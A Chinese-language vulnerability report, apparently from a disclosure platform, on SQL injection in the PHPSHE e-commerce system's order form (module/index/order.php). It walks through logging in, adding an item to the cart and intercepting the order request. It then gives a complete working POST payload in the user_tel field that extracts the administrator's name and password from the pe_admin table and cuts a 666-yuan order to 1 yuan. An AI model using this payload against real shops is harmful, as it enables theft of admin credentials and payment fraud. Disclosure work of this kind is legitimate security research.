很早之前就发现了,到现在还没修~~~
PHPSHE商城系统,在用户提交订单时,收获信息多处存在SQL注入,有回显,可直接获取管理员账户信息。
module/index/order.php文件:
这里提交的POST数据进入了函数pe_insert
到最后进入SQL语句时也没有进行过滤处理,导致sql注入
这里的参数user_addres,user_tname,user_phone,user_tel,order_text等都存在注入。
这里的注入存在回显,造成的危害:
1、不仅可以注入出管理员账户信息等;
2、还可以任意修改商品金额,任意金额购物。
第一步,普通用户登陆后,加入任意商品到购物车。
第二步,然后提交订单。
第三步,截包,修改如下。
发送请求:
链接:localhost/phpshe/index.php?mod=order&act=cartadd&product_id=1&product_num=1
POST:province=%E6%B2%B3%E5%8D%97%E7%9C%81&city=%E9%83%91%E5%B7%9E%E5%B8%82&info[user_address]=123123123&info[user_tname]=%E9%98%BF%E6%96%AF%E9%A1%BF%E9%A3%9E&info[user_phone]=13111111111&info[user_tel]=88888888' ,`order_text`=(SELECT concat(admin_name,0x23,admin_pw) FROM `pe_admin` limit 0,1), `order_productmoney` = '1' , `order_wlmoney` = '1' , `order_money` = '1' , `order_atime` = '1395119678' , `user_id` = '1' , `user_name` = '111111'#&info[order_text]=111111&pesubmit=
注意这里的金额应该是666元
发送请求后,订单成功提交了。
来看看提交后的订单详情:
成功注入出管理员的用户名密码,以及原本666元的订单,现在只需要支付1元。